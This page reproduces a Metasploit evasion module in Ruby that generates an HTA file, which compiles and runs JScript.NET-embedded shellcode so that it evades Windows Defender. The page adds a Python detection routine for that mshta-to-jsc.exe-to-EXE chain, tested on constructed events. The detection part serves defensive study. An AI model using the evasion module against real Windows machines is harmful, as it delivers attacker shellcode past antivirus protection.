GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/evasion/windows/windows_defender_js_hta.rb
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'erb'

class MetasploitModule < Msf::Evasion

  def initialize(info={})
    super(merge_info(info,
      'Name'        => 'Microsoft Windows Defender Evasive JS.Net and HTA',
      'Description' => %q{
        This module will generate an HTA file that writes and compiles a JScript.NET file
        containing shellcode on the target machine. After compilation, the generated EXE will
        execute the shellcode without interference from Windows Defender.

        It is recommended that you use a payload that uses RC4 or HTTPS for best experience.
      },
      'Author'      =>
        [
          'sinmygit',    # PoC
          'Shelby Pace'  # Metasploit Module
        ],
      'License'     => MSF_LICENSE,
      'Platform'    => 'win',
      'Arch'        => ARCH_X64,
      'Targets'     => [ [ 'Microsoft Windows', {} ] ]
    ))

    register_options([
      OptString.new(
        'FILENAME',
        [
          true,
          'Filename for the evasive file (default: random)',
          "#{Rex::Text.rand_text_alpha(3..10)}.hta"
        ])
    ])
  end

  def run
    # file_payload is used in the JScript.NET ERB template (reached through binding())
    file_payload = Rex::Text.encode_base64(payload.encoded)
    evasion_shellcode_path = File.join(Msf::Config.data_directory, 'exploits', 'evasion_shellcode.js')
    # Check that the template exists before reading it, so a missing file is reported cleanly
    fail_with(Failure::NotFound, 'The JScript.NET file was not found.') unless File.exist?(evasion_shellcode_path)
    jsnet_code = File.read(evasion_shellcode_path)
    js_file = ERB.new(jsnet_code).result(binding())
    jsnet_encoded = Rex::Text.encode_base64(js_file)

    # fname and arch are used in the HTA ERB template (reached through binding())
    fname = Rex::Text.rand_text_alpha(6)
    arch = ["x86", "x64"].include?(payload.arch.first) ? payload.arch.first : "anycpu"
    hta_path = File.join(Msf::Config.data_directory, 'exploits', 'hta_evasion.hta')
    fail_with(Failure::NotFound, 'The HTA file was not found.') unless File.exist?(hta_path)
    hta = File.read(hta_path)
    hta_file = ERB.new(hta).result(binding())
    file_create(hta_file)
  end

end
```
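Detection logic for the behaviour chain the module description spells out (an HTA that writes a JScript.NET file, compiles it, then runs the resulting EXE), as an added example that is not part of the Metasploit module. It assumes the compile step invokes the .NET Framework's JScript.NET compiler, jsc.exe (the page does not name the compiler), and that process-creation telemetry exposes parent PID, image path and command line; the sample events are constructed.

```python
import ntpath
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """One process-creation event (Sysmon Event ID 1 style fields, simplified)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


def _name(image: str) -> str:
    return ntpath.basename(image).lower()


def find_hta_jscript_chains(events):
    """Return (rule, pid, compiled_exe) tuples for both stages of the HTA -> jsc.exe -> EXE chain."""
    by_pid = {e.pid: e for e in events}
    compiled = set()   # lower-cased /out: paths handed to jsc.exe by an HTA host
    alerts = []
    for e in events:   # events are assumed to be in chronological order
        parent = by_pid.get(e.ppid)
        # Stage 1: mshta.exe (the HTA host) launches the JScript.NET compiler
        if parent and _name(parent.image) == "mshta.exe" and _name(e.image) == "jsc.exe":
            m = re.search(r'/out:"?([^\s"]+)', e.cmdline, re.IGNORECASE)
            out = m.group(1).lower() if m else None
            if out:
                compiled.add(out)
            alerts.append(("hta_compiles_jscript_net", e.pid, out))
        # Stage 2: the binary that jsc.exe just produced is executed
        elif e.image.lower() in compiled:
            alerts.append(("hta_compiled_exe_executed", e.pid, e.image.lower()))
    return alerts


# Constructed sample telemetry (not real data): a benign developer compile plus the HTA chain
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(110, 100, r"C:\Program Files\IDE\devenv.exe", "devenv.exe"),
    ProcEvent(120, 110, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe",
              r"jsc.exe /out:C:\proj\bin\tool.exe C:\proj\tool.js"),
    ProcEvent(200, 100, r"C:\Windows\System32\mshta.exe", r"mshta.exe C:\Users\u\Downloads\abcde.hta"),
    ProcEvent(300, 200, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe",
              r"jsc.exe /nologo /out:C:\Users\u\AppData\Local\Temp\qwerty.exe C:\Users\u\AppData\Local\Temp\qwerty.js"),
    ProcEvent(400, 200, r"C:\Users\u\AppData\Local\Temp\qwerty.exe", "qwerty.exe"),
]

if __name__ == "__main__":
    for alert in find_hta_jscript_chains(SAMPLE_EVENTS):
        print(alert)
```

The benign jsc.exe run under the IDE produces no alert because only compiles parented by mshta.exe seed the `compiled` set, which keeps the second rule from firing on ordinary developer builds.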